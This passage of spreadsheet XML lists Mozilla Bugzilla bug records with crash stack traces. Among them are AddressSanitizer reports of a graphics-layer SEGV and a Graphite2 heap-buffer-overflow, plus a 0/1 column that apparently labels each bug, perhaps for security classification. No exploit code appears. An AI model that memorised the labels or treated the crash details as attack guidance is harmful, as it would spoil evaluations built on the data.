      <c r="X5937" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5938">
      <c r="A5938" t="n">
        <v>1095925</v>
      </c>
      <c r="B5938" t="inlineStr">
        <is>
          <t>2014-11-08 10:49:55 -0800</t>
        </is>
      </c>
      <c r="C5938" t="inlineStr">
        <is>
          <t>SEGV in mozilla::layers::BufferTextureClient::AllocateForSurface</t>
        </is>
      </c>
      <c r="D5938" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:15 -0700</t>
        </is>
      </c>
      <c r="E5938" t="n">
        <v>1</v>
      </c>
      <c r="F5938" t="n">
        <v>1</v>
      </c>
      <c r="G5938" t="n">
        <v>3</v>
      </c>
      <c r="H5938" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5938" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5938" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K5938" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5938" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5938" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q5938" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5938" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5938" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5938" t="n">
        <v>1</v>
      </c>
      <c r="U5938" t="n">
        <v>0</v>
      </c>
      <c r="V5938" t="n">
        <v>18</v>
      </c>
      <c r="W5938" t="inlineStr">
        <is>
          <t>Created attachment 8519450
repro-file.html
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1415445665/
I'm guessing the component which this issue belongs to. Feel free to change it if I got it wrong.
Repro-file as an attachment. Note: You might need to resize firefox window to find the correct size where crash occurs.
ASAN-trace:
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(34013184,2) Cairo Status: 32
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(34013184,2) Cairo Status: 32
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(8421376,1) Cairo Status: 32
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(8421376,1) Cairo Status: 32
ASAN:SIGSEGV
=================================================================
==14686==ERROR: AddressSanitizer: SEGV on unknown address 0x7f2229ae2000 (pc 0x7f235ac9709d sp 0x7fff815ce9b8 bp 0x7fff815ce9f0 T0)
    #0 0x7f235ac9709c in memset ??:0:0
    #1 0x45f042 in __interceptor_memset _asan_rtl_:0
    #2 0x7f235ea334df in mozilla::layers::BufferTextureClient::AllocateForSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::TextureAllocationFlags) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/TextureClient.cpp:677:0
    #3 0x7f235ea22614 in mozilla::layers::TextureClient::CreateForDrawing(mozilla::layers::ISurfaceAllocator*, mozilla::gfx::SurfaceFormat, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::BackendType, mozilla::layers::TextureFlags, mozilla::layers::TextureAllocationFlags) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/TextureClient.cpp:350:0
    #4 0x7f235ea249b3 in CreateTextureClientForDrawing /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/CompositableClient.cpp:210:0
    #5 0x7f235ea249b3 in mozilla::layers::ContentClientRemoteBuffer::CreateBackBuffer(nsIntRect const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/ContentClient.cpp:302:0
    #6 0x7f235ea24f2a in BuildTextureClients /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/ContentClient.cpp:295:0
    #7 0x7f235ea24f2a in mozilla::layers::ContentClientRemoteBuffer::CreateBuffer(gfxContentType, nsIntRect const&amp;, unsigned int, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/client/ContentClient.cpp:331:0
    #8 0x7f235e982c8b in mozilla::layers::RotatedContentBuffer::BeginPaint(mozilla::layers::PaintedLayer*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/gfx/layers/RotatedBuffer.cpp:648:0
    #9 0x7f235ea36021 in mozilla::layers::ContentClientRemoteBuffer::BeginPaintBuffer(mozilla::layers::PaintedLayer*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/gfx/layers/../../dist/include/mozilla/layers/ContentClient.h:214:0
.
.
.
Output from debug build: https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan-debug/1415445665/
.
.
.
[Child 15255] WARNING: Overflowed nscoord_MAX in conversion to nscoord height: file ../../dist/include/nsRect.h, line 95
[Child 15255] WARNING: Overflowed nscoord_MAX in conversion to nscoord height: file ../../dist/include/nsRect.h, line 95
[Child 15255] WARNING: Surface size too large (exceeds caller's limit)!: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxASurface.cpp, line 394
[Child 15255] ###!!! ASSERTION: creating Xlib surface failed!: 'Error', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/basic/TextureClientX11.cpp, line 113
[Child 15255] WARNING: Failed to allocate a TextureClient, falling back to BufferTextureClient.: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/client/TextureClient.cpp, line 344
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(34013184,2) Cairo Status: 32
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(34013184,2) Cairo Status: 32
[Child 15255] WARNING: Surface size too large (exceeds caller's limit)!: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxASurface.cpp, line 394
[Child 15255] ###!!! ASSERTION: creating Xlib surface failed!: 'Error', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/basic/TextureClientX11.cpp, line 113
[Child 15255] WARNING: Failed to allocate a TextureClient, falling back to BufferTextureClient.: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/client/TextureClient.cpp, line 344
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(8421376,1) Cairo Status: 32
GFX ERROR: Attempt to create DrawTarget for invalid surface. Size(8421376,1) Cairo Status: 32
[Child 15255] WARNING: Surface size too large (exceeds caller's limit)!: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxASurface.cpp, line 394
[Child 15255] WARNING: Surface size too large (would overflow)!: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/thebes/gfxASurface.cpp, line 411
[Child 15255] ###!!! ASSERTION: creating Xlib surface failed!: 'Error', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/basic/TextureClientX11.cpp, line 113
[Child 15255] WARNING: Failed to allocate a TextureClient, falling back to BufferTextureClient.: file /builds/slave/m-cen-l64-asan-d-0000000000000/build/gfx/layers/client/TextureClient.cpp, line 344
Program /home/attekett/Downloads/firefox-debug/plugin-container (pid = 15255) received signal 11.
Stack:
#01: ???[/lib/x86_64-linux-gnu/libpthread.so.0 +0x10340]
#02: memset[/lib/x86_64-linux-gnu/libc.so.6 +0x8d09d]
#03: memset[/home/attekett/Downloads/firefox-debug/plugin-container +0x60ee3]
###!!! [Parent][MessageChannel] Error: Channel error: cannot send/recv
.
.
.</t>
        </is>
      </c>
      <c r="X5938" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5939">
      <c r="A5939" t="n">
        <v>2274</v>
      </c>
      <c r="B5939" t="inlineStr">
        <is>
          <t>1999-01-10 05:54:37 -0800</t>
        </is>
      </c>
      <c r="C5939" t="inlineStr">
        <is>
          <t>Crash while parsing</t>
        </is>
      </c>
      <c r="D5939" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:29 -0700</t>
        </is>
      </c>
      <c r="E5939" t="n">
        <v>1</v>
      </c>
      <c r="F5939" t="n">
        <v>1</v>
      </c>
      <c r="G5939" t="n">
        <v>3</v>
      </c>
      <c r="H5939" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5939" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5939" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K5939" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5939" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5939" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5939" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5939" t="inlineStr"/>
      <c r="Q5939" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5939" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5939" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5939" t="n">
        <v>1</v>
      </c>
      <c r="U5939" t="n">
        <v>0</v>
      </c>
      <c r="V5939" t="n">
        <v>2</v>
      </c>
      <c r="W5939" t="inlineStr">
        <is>
          <t>Pasing the page http://www.adelong.com.au/ crashes with the following call
stack:
NTDLL! 77f76274()
nsDebug::PreCondition(char * 0x007323e4, char * 0x00732b28, char * 0x00732af8,
int 2233) line 105 + 13 bytes
CNavDTD::CloseTopmostContainer() line 2233 + 49 bytes
CNavDTD::ReduceContextStackFor(nsHTMLTag eHTMLTag_text) line 2390
CNavDTD::HandleDefaultStartToken(CToken * 0x012e5d00, nsHTMLTag eHTMLTag_text,
nsIParserNode &amp; {...}) line 751 + 12 bytes
CNavDTD::HandleStartToken(CToken * 0x012e5d00) line 867 + 23 bytes
NavDispatchTokenHandler(CToken * 0x012e5d00, nsIDTD * 0x013aab50) line 261 + 12
bytes
CTokenHandler::operator()(CToken * 0x012e5d00, nsIDTD * 0x013aab50) line 80 + 14
bytes
CNavDTD::HandleToken(CNavDTD * const 0x013aab50, CToken * 0x012e5d00, nsIParser
* 0x01392470) line 546 + 18 bytes
CNavDTD::BuildModel(CNavDTD * const 0x013aab50, nsIParser * 0x01392470) line 476
+ 20 bytes
nsParser::BuildModel() line 694 + 16 bytes
nsParser::ResumeParse(nsIDTD * 0x00000000) line 651 + 11 bytes
nsParser::OnDataAvailable(nsParser * const 0x01392474, nsIURL * 0x012a4680,
nsIInputStream * 0x01389120, unsigned int 2043) line 878 + 17 bytes
nsDocumentBindInfo::OnDataAvailable(nsDocumentBindInfo * const 0x012a4600,
nsIURL * 0x012a4680, nsIInputStream * 0x01389120, unsigned int 2043) line 1601 +
24 bytes
OnDataAvailableProxyEvent::HandleEvent(OnDataAvailableProxyEvent * const
0x013cc910) line 615 + 45 bytes
StreamListenerProxyEvent::HandlePLEvent(PLEvent * 0x013cc914) line 455 + 12
bytes
PL_HandleEvent(PLEvent * 0x013cc914) line 395 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x0120f740) line 357 + 9 bytes
_md_EventReceiverProc(void * 0x1c76025e, unsigned int 49370, unsigned int 0,
long 18937664) line 675 + 9 bytes
USER32! 77e71268()
0120f740()</t>
        </is>
      </c>
      <c r="X5939" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5940">
      <c r="A5940" t="n">
        <v>1685403</v>
      </c>
      <c r="B5940" t="inlineStr">
        <is>
          <t>2021-01-06 13:48:03 -0800</t>
        </is>
      </c>
      <c r="C5940" t="inlineStr">
        <is>
          <t>onLoadRequest contains translated jar:file:/// URI instead of moz-extension:///</t>
        </is>
      </c>
      <c r="D5940" t="inlineStr">
        <is>
          <t>2023-10-17 20:43:31 -0700</t>
        </is>
      </c>
      <c r="E5940" t="n">
        <v>1</v>
      </c>
      <c r="F5940" t="n">
        <v>1</v>
      </c>
      <c r="G5940" t="n">
        <v>3</v>
      </c>
      <c r="H5940" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5940" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5940" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5940" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5940" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5940" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5940" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5940" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue][post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q5940" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5940" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5940" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T5940" t="n">
        <v>1</v>
      </c>
      <c r="U5940" t="n">
        <v>0</v>
      </c>
      <c r="V5940" t="n">
        <v>49</v>
      </c>
      <c r="W5940" t="inlineStr">
        <is>
          <t>From github: https://github.com/mozilla-mobile/fenix/issues/17321.
&gt; ## Steps to reproduce
&gt; 1. Install HTTPS Everywhere for Firefox Android
&gt; 2. Go to Add-Ons Menu for HTTPS Everywhere
&gt; 3. Toggle "ON" for Encrypt All Sites Eligible setting
&gt; 4. Navigate to an insecure page with no HTTPS support, such as [http.badssl.com](http.badssl.com)
&gt; 
&gt; ### Expected behavior
&gt; Display EASE mode page for insecure sites:
&gt; ![image](https://user-images.githubusercontent.com/4276080/103713950-5d976100-4f72-11eb-8877-de12c0cb3c14.png)
&gt; 
&gt; ### Actual behavior
&gt; Redirects to an error page with am unfamiliar prefix that I assume is browser based:
&gt; ![image](https://user-images.githubusercontent.com/4276080/103715027-65f09b80-4f74-11eb-930f-6b8866953bf0.png)
&gt; 
&gt; URL: 
&gt; `jar:file:///data/user/0/org.mozilla.fenix/files/mozilla/p4a5m9oi.default/extensions/https-everywhere@eff.org.xpi!/pages/cancel/index.html?originURL=http%3A%2F%2Fhttp.badssl.com%2F`
&gt; 
&gt; Console Output during this time:
&gt; [console-export-2021-1-5_16-5-27.txt](https://github.com/mozilla-mobile/fenix/files/5773285/console-export-2021-1-5_16-5-27.txt)
&gt; 
&gt; When I turn HTTPSE EASE mode off and then back on, this strange error occurs where it tries to navigate to the extension's EASE interstitial but the extension's assets URIs get remapped to the insecure link's URI. Breaking scripts and other assets that need to be loaded for the page:
&gt; ![image](https://user-images.githubusercontent.com/4276080/103715157-bbc54380-4f74-11eb-9b90-dcda144672b0.png)
&gt; 
&gt; Console error:
&gt; ```bash
&gt; 16:06:27.251 Loading failed for the &lt;script&gt; with source “http://http.badssl.com/translation.js”. http.badssl.com:28:1
&gt; 16:06:27.326 Loading failed for the &lt;script&gt; with source “http://http.badssl.com/util.js”. http.badssl.com:29:1
&gt; 16:06:27.379 Loading failed for the &lt;script&gt; with source “http://http.badssl.com/ux.js”. http.badssl.com:30:1
&gt; ```
&gt; [console-export-2021-1-5_16-6-48.txt](https://github.com/mozilla-mobile/fenix/files/5773289/console-export-2021-1-5_16-6-48.txt)
&gt; 
&gt; ### Device information
&gt; Reported across at least two devices, with different builds of Fenix (Stable and Nightly) but I will just give my specs
&gt; * Android device: 
&gt;   Pixel 3a, Android 11, Build RQ1A.201205.003
&gt; * Fenix version: 
&gt;   Nightly 210104 19:29 (Build #2015785435)
&gt;   AC: 71.0.20210104143130, 3790c3ac2
&gt;   GV: 86.0a1-20210103092941
&gt;   AS: 67.2.0
&gt; 
&gt; Note: I am the lead developer on the HTTPS Everywhere project and if there is something that can help guide me to take care of this error on my end, feel free to to speak to that. I am personally stuck debugging this error and can't seem to find the trigger point for this error.
&gt;  
&gt; 
Change performed by the [Move to Bugzilla add-on](https://addons.mozilla.org/en-US/firefox/addon/move-to-bugzilla/).</t>
        </is>
      </c>
      <c r="X5940" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5941">
      <c r="A5941" t="n">
        <v>1527792</v>
      </c>
      <c r="B5941" t="inlineStr">
        <is>
          <t>2019-02-13 17:32:45 -0800</t>
        </is>
      </c>
      <c r="C5941" t="inlineStr">
        <is>
          <t>socorro deploy: 366</t>
        </is>
      </c>
      <c r="D5941" t="inlineStr">
        <is>
          <t>2019-02-13 18:22:40 -0800</t>
        </is>
      </c>
      <c r="E5941" t="n">
        <v>1</v>
      </c>
      <c r="F5941" t="n">
        <v>1</v>
      </c>
      <c r="G5941" t="n">
        <v>4</v>
      </c>
      <c r="H5941" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5941" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5941" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K5941" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5941" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5941" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5941" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5941" t="inlineStr"/>
      <c r="Q5941" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5941" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5941" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5941" t="n">
        <v>1</v>
      </c>
      <c r="U5941" t="n">
        <v>0</v>
      </c>
      <c r="V5941" t="n">
        <v>4</v>
      </c>
      <c r="W5941" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 366.
It consists of the following:
(current tag: 365 - `490e09a`)
`aaa58b1`: bug 1527728: fix versions in nav bar (willkg)
(next tag: 366 - `87e414a`)</t>
        </is>
      </c>
      <c r="X5941" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5942">
      <c r="A5942" t="n">
        <v>58128</v>
      </c>
      <c r="B5942" t="inlineStr">
        <is>
          <t>2000-10-26 15:06:28 -0700</t>
        </is>
      </c>
      <c r="C5942" t="inlineStr">
        <is>
          <t>crash on visiting page with Shockwave content after SW registration</t>
        </is>
      </c>
      <c r="D5942" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5942" t="n">
        <v>1</v>
      </c>
      <c r="F5942" t="n">
        <v>1</v>
      </c>
      <c r="G5942" t="n">
        <v>6</v>
      </c>
      <c r="H5942" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5942" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5942" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5942" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5942" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5942" t="inlineStr">
        <is>
          <t>rtm stopper</t>
        </is>
      </c>
      <c r="Q5942" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5942" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5942" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T5942" t="n">
        <v>1</v>
      </c>
      <c r="U5942" t="n">
        <v>0</v>
      </c>
      <c r="V5942" t="n">
        <v>90</v>
      </c>
      <c r="W5942" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh; N; PPC; en-US; m18) Gecko/20001019 Netscape6/6.0
BuildID:    2000092908
 When you use the shim installer on winows toward the end of the shockwave
install process N6pr3 crashes at the "Welcome" page
Reproducible: Always
Steps to Reproduce:
1. Install a full pinging version of Shockwave 8 (you can get by going to
Shockwave.com or macromedia.com)(you have to launch browser and go to a
shockwave game to continue install process)
2. Complete registration.
Results: The welcome movie page at
http://www.shockwave.com/bin/shockwave/account/welcome/welcome.jsp will attempt
to refresh multiple times before Netscape crashes.
Expected: Not to do that.
Actual Results:                              crash
Expected Results:                              no crash
       John Pfeiffer's bug 63050 in our bugbase</t>
        </is>
      </c>
      <c r="X5942" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5943">
      <c r="A5943" t="n">
        <v>765409</v>
      </c>
      <c r="B5943" t="inlineStr">
        <is>
          <t>2012-06-15 16:40:29 -0700</t>
        </is>
      </c>
      <c r="C5943" t="inlineStr">
        <is>
          <t>Crash [@ nsLineLayout::ReflowFrame(nsIFrame *,unsigned int &amp;,nsHTMLReflowMetrics *,bool &amp;) ] | ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)' | ASSERTION: StealFrame: can't find aChild: 'removed' | ASSERTION: StealFrame failure: 'NS_SUCCE</t>
        </is>
      </c>
      <c r="D5943" t="inlineStr">
        <is>
          <t>2017-10-06 16:17:03 -0700</t>
        </is>
      </c>
      <c r="E5943" t="n">
        <v>1</v>
      </c>
      <c r="F5943" t="n">
        <v>1</v>
      </c>
      <c r="G5943" t="n">
        <v>3</v>
      </c>
      <c r="H5943" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5943" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5943" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5943" t="inlineStr">
        <is>
          <t>14 Branch</t>
        </is>
      </c>
      <c r="L5943" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5943" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5943" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5943" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q5943" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5943" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5943" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5943" t="n">
        <v>1</v>
      </c>
      <c r="U5943" t="n">
        <v>0</v>
      </c>
      <c r="V5943" t="n">
        <v>37</v>
      </c>
      <c r="W5943" t="inlineStr">
        <is>
          <t>Created attachment 633722
crash report
1. http://www2.emersonprocess.com/en-US/brands/EIM-Actuators/Products/Electric/Pages/M2CP_Electric_Actuator.aspx
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file c:/work/mozilla/builds/nightly/mozilla/layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file c:/work/mozilla/builds/nightly/mozilla/layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file c:/work/mozilla/builds/nightly/mozilla/layout/generic/nsContainerFrame.cpp, line 1339
Crash @ nsLineLayout::ReflowFrame(nsIFrame *,unsigned int &amp;,nsHTMLReflowMetrics *,bool &amp;)
This appears to be Beta/14, Aurora/15, and Nightly/16 though I am getting inconsistent results sometimes on different platforms.</t>
        </is>
      </c>
      <c r="X5943" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5944">
      <c r="A5944" t="n">
        <v>1352747</v>
      </c>
      <c r="B5944" t="inlineStr">
        <is>
          <t>2017-04-01 14:03:16 -0700</t>
        </is>
      </c>
      <c r="C5944" t="inlineStr">
        <is>
          <t>Graphite2 heap-buffer-overflow write [@ lz4::decompress] src/Decompressor.cpp:90</t>
        </is>
      </c>
      <c r="D5944" t="inlineStr">
        <is>
          <t>2017-10-26 19:19:55 -0700</t>
        </is>
      </c>
      <c r="E5944" t="n">
        <v>1</v>
      </c>
      <c r="F5944" t="n">
        <v>1</v>
      </c>
      <c r="G5944" t="n">
        <v>3</v>
      </c>
      <c r="H5944" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5944" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5944" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5944" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5944" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5944" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5944" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5944" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5944" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5944" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5944" t="n">
        <v>1</v>
      </c>
      <c r="U5944" t="n">
        <v>0</v>
      </c>
      <c r="V5944" t="n">
        <v>7</v>
      </c>
      <c r="W5944" t="inlineStr">
        <is>
          <t>Created attachment 8853700
test_case.ttf
Found in 28cc60d with a 32 bit build.
To reproduce run:
./gr2fonttest -auto -demand test_case.ttf
==5957==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5203f84 at pc 0x081acfc2 bp 0xff9a3948 sp 0xff9a393c
WRITE of size 4 at 0xf5203f84 thread T0
    #0 0x81acfc1 in void (anonymous namespace)::unaligned_copy&lt;4&gt;(void*, void const*) src/inc/Compression.h:55:3
    #1 0x81acfc1 in (anonymous namespace)::overrun_copy(unsigned char*, unsigned char const*, unsigned int) src/inc/Compression.h:75
    #2 0x81acfc1 in lz4::decompress(void const*, unsigned int, void*, unsigned int) src/Decompressor.cpp:90
    #3 0x814e6ac in graphite2::Face::Table::decompress() src/Face.cpp:339:20
    #4 0x814dd32 in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) src/Face.cpp:292:9
    #5 0x8140540 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) src/gr_face.cpp:49:21
    #6 0x8141aba in gr_make_face_with_ops src/gr_face.cpp:89:16
    #7 0x8141aba in gr_make_file_face src/gr_face.cpp:242
    #8 0x813b99e in Parameters::testFileFont() const gr2fonttest/gr2FontTest.cpp:639:20
    #9 0x813d9d3 in main gr2fonttest/gr2FontTest.cpp:798:9
    #10 0xf75bc636 in __libc_start_main /build/glibc-5sb1ri/glibc-2.23/csu/../csu/libc-start.c:291
    #11 0x805fe47 in _start (/home/user/workspace/graphite2/gr2fonttest+0x805fe47)
0xf5203f84 is located 0 bytes to the right of 1796-byte region [0xf5203880,0xf5203f84)
allocated by thread T0 here:
    #0 0x8104184 in __interceptor_malloc (/home/user/workspace/graphite2/gr2fonttest+0x8104184)
    #1 0x814e5f2 in unsigned char* graphite2::gralloc&lt;unsigned char&gt;(unsigned int) src/inc/Main.h:88:28
    #2 0x814e5f2 in graphite2::Face::Table::decompress() src/Face.cpp:333
    #3 0x814dd32 in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) src/Face.cpp:292:9
    #4 0x8140540 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) src/gr_face.cpp:49:21
    #5 0x8141aba in gr_make_face_with_ops src/gr_face.cpp:89:16
    #6 0x8141aba in gr_make_file_face src/gr_face.cpp:242
    #7 0x813b99e in Parameters::testFileFont() const gr2fonttest/gr2FontTest.cpp:639:20
    #8 0x813d9d3 in main gr2fonttest/gr2FontTest.cpp:798:9
    #9 0xf75bc636 in __libc_start_main /build/glibc-5sb1ri/glibc-2.23/csu/../csu/libc-start.c:291</t>
        </is>
      </c>
      <c r="X5944" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5945">
      <c r="A5945" t="n">
        <v>31324</v>
      </c>
      <c r="B5945" t="inlineStr">
        <is>
          <t>2000-03-10 06:48:56 -0800</t>
        </is>
      </c>
      <c r="C5945" t="inlineStr">
        <is>
          <t>Bugzilla displays attempted HTML links incorrectly</t>
        </is>
      </c>
      <c r="D5945" t="inlineStr">
        <is>
